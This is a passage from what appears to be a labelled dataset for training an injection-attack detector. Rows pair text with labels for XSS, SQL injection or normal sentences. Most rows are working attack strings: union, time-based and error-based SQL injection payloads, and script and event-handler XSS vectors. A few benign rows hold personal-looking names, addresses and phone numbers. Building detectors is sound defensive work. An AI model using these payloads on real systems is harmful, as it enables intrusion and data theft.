and 8438 = 7620--",2,SQLi,20924 "1"" ) ) as fapw where 4722 = 4722 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,14147 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--",2,SQLi,17849 "<nav onmouseenter=""alert(1)"">test</nav>",1,XSS,8218 select * from users where id = 1 or \.<1 or 1 = 1 -- 1,2,SQLi,17858 "<div draggable=""true"" contenteditable>drag me</div><nobr ondragover=alert(1) contenteditable>drop here</nobr>",1,XSS,1097 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--",2,SQLi,14762 "1' ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13906 Select your favorite actor.,3,normal,24333 <tfoot id=x tabindex=1 onfocus=alert(1)></tfoot>,1,XSS,5878 "-8929' union all select 5324,5324,5324,5324,5324,5324--",2,SQLi,17821 "Elijah Cummings, the top Democrat on the select Committee on Benghazi, said Kendall's response simply ""confirms what we all knew."" ""Secretary Clinton already produced her official records to the State Department, that she did not keep her personal emails, and that the select Committee has already obtained her emails relating to the attacks in Benghazi,"" he said.",3,normal,26220 "<div draggable=""true"" contenteditable>drag me</div><frame ondrop=alert(1) contenteditable>drop here</frame>",1,XSS,1162 "select * from users where id = '1' or $+<$ union select 1,@@VERSION -- 1'",2,SQLi,15839 "(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'""",2,SQLi,15469 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11",2,SQLi,19440 if ( 8264 = 1939 ) select 8264 else drop function nsoq--,2,SQLi,17653 "`""'><img src=xxx:x \x20onerror=javascript:alert(1)>",1,XSS,5304 <span onfocusout=alert(1) tabindex=1 id=x></span><input autofocus>,1,XSS,2770 "1%"" ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13383 ></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder=0%EF%BB%BF,1,XSS,1575 "1'+ ( select 'aphz' where 1933 = 1933 union all select null,null,null,null,null,null#",2,SQLi,14911 "<output onkeydown=""alert(1)"" contenteditable>test</output>",1,XSS,3953 "1%"" ) ) and elt ( 7633 = 4110,4110 ) and ( ( ""%"" = """,2,SQLi,18225 Select the right lens for the camera.,3,normal,24102 "<center draggable=""true"" ondragleave=""alert(1)"">test</center>",1,XSS,3369 And you select objects and life forms to go in.,3,normal,26365 Select your glide.,3,normal,25027 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ""ihqf"" = ""ihqf",2,SQLi,13459 "1' or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and 'ebuo' = 'ebuo",2,SQLi,11566 "<BODY BACKGROUND=""javascript:alert('')"">",1,XSS,8012 "<ScRipT>alert(""XSS"");</ScRipT>",1,XSS,9534 "{""id"":null,""name"":""correctly""}",3,normal,27467 "{""id"":null,""firstName"":""Frankie"",""lastName"":""Lim Bg"",""address"":""97 WEST OAK AVE, PANAMA CITY FL 32401"",""city"":""377"",""telephone"":""5393867061""}",3,normal,27396 "1 ) where 2473 = 2473 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) --",2,SQLi,12534 "1'+ ( select pdfv where 1172 = 1172 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) ) +'",2,SQLi,12010 <canvas id=x tabindex=1 onactivate=alert(1)></canvas>,1,XSS,4997 <Z oncut=alert()>x,1,XSS,9784 "1"" and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11774 -9429' ) order by 1--,2,SQLi,21665 "<pre ondblclick=""alert(1)"">test</pre>",1,XSS,8711 Select last.,3,normal,24490 "<style>:target {color: red;}</style><col id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></col>",1,XSS,1102 1 ) as duqb where 6495 = 6495,2,SQLi,20770 "<basefont onkeydown=""alert(1)"" contenteditable>test</basefont>",1,XSS,3237 Delete the outdated files.,3,normal,22665 <command id=x tabindex=1 onfocusin=alert(1)></command>,1,XSS,4724 "-2247' ) union all select 1202,1202,1202,1202,1202#",2,SQLi,18351 1' ) where 8086 = 8086 and 1430 = 7941--,2,SQLi,19548 "<hr onbeforecut=""alert(1)"" contenteditable>test</hr>",1,XSS,5268 1' in boolean mode ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) #,2,SQLi,15350 "<style oncontextmenu=""alert(1)"">test</style>",1,XSS,7035 "-8902 union all select 4339,4339,4339#",2,SQLi,19676 "<style>@keyframes slidein {}</style><content style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></content>",1,XSS,331 "1"" ) ) as svim where 4924 = 4924 and 7932 = 5870",2,SQLi,18783 ")) or ((x""))=((""x",2,SQLi,22074 "<dir draggable=""true"" ondragenter=""alert(1)"">test</dir>",1,XSS,4524 "{""id"":null,""name"":""unknown tape""}",3,normal,27274 "<style>:target {color:red;}</style><menuitem id=x style=""transition:color 1s"" ontransitionend=alert(1)></menuitem>",1,XSS,851 Where's the swimming pool?,3,normal,23602 1 ) where 2734 = 2734 waitfor delay '0:0:5'--,2,SQLi,19010 "<sub draggable=""true"" ondrag=""alert(1)"">test</sub>",1,XSS,5609 It also includes a FOX live stream in select markets.,3,normal,25978 <ruby onblur=alert(1) tabindex=1 id=x></ruby><input autofocus>,1,XSS,3150 "<style>:target {color:red;}</style><ins id=x style=""transition:color 1s"" ontransitionend=alert(1)></ins>",1,XSS,1286 "1' ) as dvoy where 7906 = 7906 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11640 "<th onmouseleave=""alert(1)"">test</th>",1,XSS,8609 "AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND 1337"" LIKE ""1337",2,SQLi,16561 "{""id"":null,""name"":""affect""}",3,normal,27286 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><image id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></image>",1,XSS,211 -7624' ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( 'iwab' = 'iwab,2,SQLi,12738 <details id=x tabindex=1 onbeforeactivate=alert(1)></details>,1,XSS,3273 "<small draggable=""true"" ondrag=""alert(1)"">test</small>",1,XSS,4719 "-4746%"" ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( ""%"" = """,2,SQLi,10310 "<style>:target {color: red;}</style><form id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></form>",1,XSS,1006 ORDER BY 4,2,SQLi,22419 "Under ""Security and Sign-In"" select ""Two-Step Verification,"" and then scroll down to select the ""Authenticator app"" option. 3.",3,normal,25232 "1' ) ) as xntz where 5801 = 5801 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --",2,SQLi,10556 1 ) as ozga where 4002 = 4002 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --,2,SQLi,15271 "1' or elt ( 6272 = 6272,sleep ( 5 ) ) and 'fvtf' like 'fvtf",2,SQLi,17289 "1' and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and 'hstg' like 'hstg",2,SQLi,11495 "-4015"" where 2610 = 2610 or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11549 or a = a--,2,SQLi,22438 <noframes onpointerdown=alert(1)>XSS</noframes>,1,XSS,6214 <del onblur=alert(1) tabindex=1 id=x></del><input autofocus>,1,XSS,3544 "-1807' ) ) union all select 9853,9853,9853,9853,9853,9853#",2,SQLi,17378 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sup id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></sup>",1,XSS,255 "{""id"":null,""name"":""Zubaeagermon""}",3,normal,27490 "<u onmouseout=""alert(1)"">test</u>",1,XSS,9343 "-4527' union all select 7115,7115#",2,SQLi,20147 "<isindex onmouseover=""alert(1)"">test</isindex>",1,XSS,6405 "{""id"":null,""firstName"":""Marinah"",""lastName"":""Maman"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26965 <table onpointerover=alert(1)>XSS</table>,1,XSS,7635 "<style>@keyframes x{}</style><kbd style=""animation-name:x"" onanimationend=""alert(1)""></kbd>",1,XSS,1730 "Select Steam in the top-left corner of the screen, and then from the dropdown menu, select ""Settings"" if you're on PC, or ""Preferences"" if you're on a Mac.",3,normal,25614 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5--",2,SQLi,14701 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 8 ) ) AND 'i' = 'i",2,SQLi,11465 "1"" where 3318 = 3318",2,SQLi,21876 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22",2,SQLi,14617 "alert(String.fromCharCode(88,83,83))//"";alert(String.fromCharCode(88,83,83))//--",1,XSS,1973 I'll select a new painting to hang in the living room.,3,normal,23910 "1 ) ) union all select null,null#",2,SQLi,20211 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( 'nslo' like 'nslo",2,SQLi,16104 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and 'fvda' like 'fvda",2,SQLi,13079 if ( 6554 = 1534 ) select 6554 else drop function buqb--,2,SQLi,17686 &lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS,1,XSS,696 "1' and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and 'blie' = 'blie",2,SQLi,12071 "{""id"":null,""firstName"":""Ab"",""lastName"":""Rahim"",""address"":""1950 5th Ave"",""city"":""507"",""telephone"":""1974706508""}",3,normal,27021 <base id=x tabindex=1 onbeforedeactivate=alert(1)></base><input autofocus>,1,XSS,2286 "<progress onkeypress=""alert(1)"" contenteditable>test</progress>",1,XSS,3096 "<style>@keyframes x{}</style><font style=""animation-name:x"" onanimationend=""alert(1)""></font>",1,XSS,1679 "<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('XSS')</SCRIPT>"">",1,XSS,2116 "If Trump wins, he will select Yellen's successor in 2018.",3,normal,26056 select pg_sleep ( 5 ) and ( 'aydg' = 'aydg,2,SQLi,19268 or 'a' = 'a,2,SQLi,22402 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i",2,SQLi,11316 "<img onkeypress=""alert(1)"" contenteditable>test</img>",1,XSS,5043 "<multicol onkeyup=""alert(1)"" contenteditable>test</multicol>",1,XSS,3565 -1648 ) ) as oqqy where 3459 = 3459 or 6872 = 6872--,2,SQLi,18186 1 ) as nbno where 9816 = 9816 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,9978 "))) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,19337 <command onpointerenter=alert(1)>XSS</command>,1,XSS,6314 "1'|| ( select 'dbxr' where 4014 = 4014 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12127 "1'|| ( select 'qued' where 9801 = 9801 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,12028 "1' ) ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17064 "-1678"" where 3706 = 3706 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10407 "<option onmouseleave=""alert(1)"">test</option>",1,XSS,6687 I will select.,3,normal,24419 "<bdo onmouseenter=""alert(1)"">test</bdo>",1,XSS,8189 An impartial committee to select the final list of names was suggested to avoid blunders.,3,normal,26375 "-8599 ) ) or elt ( 5628 = 2324,2324 ) and ( ( 1134 = 1134",2,SQLi,17558 "1'|| ( select 'fbtm' where 1335 = 1335 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) ||'",2,SQLi,11655 Select the right angle for the shot.,3,normal,24189 <bdo id=x tabindex=1 ondeactivate=alert(1)></bdo><input id=y autofocus>,1,XSS,2486 "1%"" and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ""%"" = """,2,SQLi,13058 Let's discuss where to travel next summer.,3,normal,23982 "))) AND ELT(1337=1337,SLEEP(5)) AND (((1337""=""1337",2,SQLi,18421 <select onpointermove=alert(1)>XSS</select>,1,XSS,7208 "<br draggable=""true"" ondrag=""alert(1)"">test</br>",1,XSS,5969 Where's the cathedral?,3,normal,23532 Stone apologized but said he did not select the image himself.,3,normal,25523 Select the right playlist for the mood.,3,normal,24258 "<source onbeforecopy=""alert(1)"" contenteditable>test</source>",1,XSS,3411 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--",2,SQLi,9914 "{""id"":null,""name"":""African Bush Elephant""}",3,normal,27586 "<option ondblclick=""alert(1)"">test</option>",1,XSS,7195 I need to decide where to go for a swim.,3,normal,23750 "<div draggable=""true"" contenteditable>drag me</div><embed ondrop=alert(1) contenteditable>drop here</embed>",1,XSS,1161 1 ) where 2930 = 2930,2,SQLi,21696 "1"" ) ) as casz where 5921 = 5921 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #",2,SQLi,14698 <rt onpointerover=alert(1)>XSS</rt>,1,XSS,9027 "1"" and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15209 """While Secretary Clinton has testified before committees in both the House and the Senate about the tragic events in Benghazi, she has made clear that she will voluntarily testify publicly again before the select Committee and, at that time, is happy to continue to answer any questions the select Committee may have about her email use."" Last month, Rep.",3,normal,26448 <mark onpointerleave=alert(1)>XSS</mark>,1,XSS,7956 Select your partner.,3,normal,24839 "<rtc onmouseleave=""alert(1)"">test</rtc>",1,XSS,8121 "1"" ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ""ladc"" like ""ladc",2,SQLi,14144 if ( 6842 = 5446 ) select 6842 else drop function vjfq--,2,SQLi,17680 "-2296"" union all select 7359,7359,7359,7359,7359,7359#",2,SQLi,18026 select ( case when ( 9388 = 4322 ) then 1 else 9388* ( select 9388 from master..sysdatabases ) end ) --,2,SQLi,13972 "1"" ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12100 "1"" where 9083 = 9083 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11203 -7707' ) ) union all select 3172#,2,SQLi,20227 "<article oncontextmenu=""alert(1)"">test</article>",1,XSS,5916 "1%"" ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( ( ""%"" = """,2,SQLi,16864 Where's the SQL statement?,3,normal,23463 "<br draggable=""true"" ondragend=""alert(1)"">test</br>",1,XSS,5399 1' ) ) as nhkp where 8030 = 8030,2,SQLi,20268 "-8129' ) ) ) union all select 4531,4531,4531#",2,SQLi,19023 "-6279' ) union all select 3026,3026,3026,3026,3026,3026,3026,3026--",2,SQLi,16504 http://www.google<script .com>alert(document.location)</script,1,XSS,3132 <title onpointerout=alert(1)>XSS</title>,1,XSS,8018 "<INPUT TYPE=""BUTTON"" action=""alert('XSS')""/>",1,XSS,6783 "1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) -- xsob",2,SQLi,12147 <discard onpointerdown=alert(1)>XSS</discard>,1,XSS,6621 <summary onblur=alert(1) tabindex=1 id=x></summary><input autofocus>,1,XSS,2629 -6397%' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and '%' = ',2,SQLi,10583 <tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus>,1,XSS,2241 "<style>:target {transform: rotate(180deg);}</style><template id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></template>",1,XSS,546 <img src='1' onerror/=alert(0) />,1,XSS,9402 "1"" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ""zyoo"" = ""zyoo",2,SQLi,11243 "1 ) ) as tbiq where 7159 = 7159 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13963 <element onfocusout=alert(1) tabindex=1 id=x></element><input autofocus>,1,XSS,2391 "<sub onbeforepaste=""alert(1)"" contenteditable>test</sub>",1,XSS,4263 function,3,normal,23164 "select * from users where id = 1 + $+*\ union select null,@@VERSION -- 1",2,SQLi,15927 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9",2,SQLi,20123 1' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and 'toxr' like 'toxr,2,SQLi,10607 select ( case when ( 5423 = 7706 ) then 5423 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13603 "{""id"":null,""firstName"":""Lalyn"",""lastName"":""Astorga"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27108 "<div draggable=""true"" contenteditable>drag me</div><keygen ondrop=alert(1) contenteditable>drop here</keygen>",1,XSS,1056 RANDOMBLOB(1000000000/2),2,SQLi,21173 "<bdi onpaste=""alert(1)"" contenteditable>test</bdi>",1,XSS,5593 Aggregate data where possible.,3,normal,23450 "select * from users where id = 1 or ""& ( "" or 1 = 1 -- 1",2,SQLi,17569 "<address oncut=""alert(1)"" contenteditable>test</address>",1,XSS,4270 "iif ( 4436 = 8910,1,1/0 )",2,SQLi,21095 "-8612"" ) or 4043 = 3083 and ( ""pjzo"" like ""pjzo",2,SQLi,18833 Select your size.,3,normal,24808 year,3,normal,23204 Update your wardrobe with new clothes.,3,normal,22923 "{""id"":null,""name"":""base""}",3,normal,27129 "<dir draggable=""true"" ondragstart=""alert(1)"">test</dir>",1,XSS,4537 -5880' ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'rwgl' = 'rwgl,2,SQLi,10570 "To see the final sculptures from this studio scene, go to my website, select Sculpture, then select Concrete.",3,normal,25262 "1' in boolean mode ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) #",2,SQLi,12698 "><script+src=https://ulogin.ru/token.php?callback=alert(1337)""></script>",1,XSS,2399 "<ruby draggable=""true"" ondragleave=""alert(1)"">test</ruby>",1,XSS,4186 "<svg><path><animateMotion onrepeat=alert(1) dur=""1s"" repeatCount=""2"">",1,XSS,2578 "<picture><source srcset=""validimage.png""><img onload=alert(1)></picture>",1,XSS,2375 ) or ( 'x' ) = ( 'x,2,SQLi,21929 "Additionally, members will be able to find select storage pieces, select bedding, and all holiday ornaments for up to 20% off.",3,normal,26410 Select disapprove.,3,normal,24578 "{""id"":null,""name"":""society""}",3,normal,27319 "1' or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,14128 "1' or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and 'lxqz' = 'lxqz",2,SQLi,11260 <dl id=x tabindex=1 onbeforedeactivate=alert(1)></dl><input autofocus>,1,XSS,2517 "<figure onpaste=""alert(1)"" contenteditable>test</figure>",1,XSS,4264 "benchmark(10000000,MD5(1))#",2,SQLi,20851 "-5597' ) or make_set ( 2490 = 2164,2164 )",2,SQLi,19394 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23",2,SQLi,16823 "select * from users where id = 1 <@<@ union select version ( ) ,version ( ) -- 1",2,SQLi,15174 <base id=x tabindex=1 onactivate=alert(1)></base>,1,XSS,5780 "1%' ) ) union all select null,null,null,null,null--",2,SQLi,18370 "<track draggable=""true"" ondragleave=""alert(1)"">test</track>",1,XSS,3697 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--",2,SQLi,17118 """ or true--",2,SQLi,22400 "{""id"":null,""firstName"":""Robib"",""lastName"":""Thyng"",""address"":""3555 SOUTHERN HILLS DR, SIOUX CITY IA 51106"",""city"":""697"",""telephone"":""851870673""}",3,normal,26897 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i",2,SQLi,11744 "<ruby draggable=""true"" ondragend=""alert(1)"">test</ruby>",1,XSS,4505 "<tr onpaste=""alert(1)"" contenteditable>test</tr>",1,XSS,5875 Select your dream wedding venue.,3,normal,24355 -1436' or 5699 = 5783--,2,SQLi,21327 "<audio autoplay controls onseeking=alert(1)><source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,1497 Plant a fragrant garden.,3,normal,22642 select ( case when ( 3140 = 4625 ) then 1 else 3140* ( select 3140 from master..sysdatabases ) end ) --,2,SQLi,13984 "<head draggable=""true"" ondragleave=""alert(1)"">test</head>",1,XSS,4093 The team decided to order pizza for lunch.,3,normal,22914 <tbody onblur=alert(1) tabindex=1 id=x></tbody><input autofocus>,1,XSS,2890 Get Stars at the grocery store from select Starbucks items.5.,3,normal,26150 "<figcaption onmouseenter=""alert(1)"">test</figcaption>",1,XSS,4930 -7037' ) ) as epsg where 3684 = 3684 union all select 3684--,2,SQLi,17206 "<code draggable=""true"" ondrag=""alert(1)"">test</code>",1,XSS,5208 <link onfocusin=alert(1) id=x tabindex=1 style=display:block>,1,XSS,3321 "<datalist onpaste=""alert(1)"" contenteditable>test</datalist>",1,XSS,3576 "<style>:target {color: red;}</style><video id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></video>",1,XSS,918 "1%' ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( '%' = '",2,SQLi,16935 "UNION ALL SELECT 1,2,3,4#",2,SQLi,21029 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--",2,SQLi,11160 <ScRiPt>alert(1)</sCriPt>,1,XSS,9700 "In 1549 he was placed on a commission to examine Anabaptists, and in 1551 he was appointed chancellor to Bishop Ridley, select preacher at Canterbury, and a commissioner for the reform of the canon law; in 1552 Coverdale made him archdeacon of Exeter.",3,normal,26033 "<DIV STYLE=""width: expression(alert('XSS'));"">",1,XSS,6266 Where's the addiction counselor,3,normal,23670 "1%' ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( '%' = '",2,SQLi,12443 "<param onkeypress=""alert(1)"" contenteditable>test</param>",1,XSS,4021 "select * from users where id = 1 or 1#"". = 1 union select 1,version ( ) -- 1",2,SQLi,15480 "-8824%' ) ) or make_set ( 9354 = 9354,7185 ) and ( ( '%' = '",2,SQLi,17182 1'|| ( select 'dajl' from dual where 8440 = 8440,2,SQLi,18706 "1%' ) ) union all select null,null,null,null--",2,SQLi,18970 "<footer oncontextmenu=""alert(1)"">test</footer>",1,XSS,6431 "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,17565 Where are my keys?,3,normal,23490 "<noframes onbeforepaste=""alert(1)"" contenteditable>test</noframes>",1,XSS,2752 "{""id"":null,""name"":""hurry ought""}",3,normal,26889 Where did they go?,3,normal,23485 a' or 1 = 1--,2,SQLi,22267 "select * from users where id = '1' union select +\#,@@VERSION -- 1'",2,SQLi,16474 "1 ) union all select null,null#",2,SQLi,20463 "1"" union all select null,null,null,null,null--",2,SQLi,18948 "<style>:target {transform: rotate(180deg);}</style><object id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></object>",1,XSS,600 &lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;,1,XSS,4003 "-5196"" ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( ""gbcq"" like ""gbcq",2,SQLi,10121 select * from users where id = '1' or !<@ or 1 = 1 -- 1',2,SQLi,17601 ") , waitfor delay '0:0:__TIME__'--",2,SQLi,20132 ") RLIKE SLEEP(5) AND (1337"" LIKE ""1337",2,SQLi,19672 "<area oncut=""alert(1)"" contenteditable>test</area>",1,XSS,5674 <template onpointerdown=alert(1)>XSS</template>,1,XSS,6219 Select the right colors for the artwork.,3,normal,24192 "-5322"" union all select 6494,6494,6494,6494,6494,6494--",2,SQLi,17812 1' ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ( 'prjf' = 'prjf,2,SQLi,15495 <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>,1,XSS,5082 "1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,15414 "-5496 union all select 2099,2099,2099#",2,SQLi,19760 1'|| ( select 'tjzy' where 3037 = 3037,2,SQLi,19750 1'+ ( select 'cwta' where 6091 = 6091,2,SQLi,19805 "AND 5650=CONVERT(INT,(UNION ALL 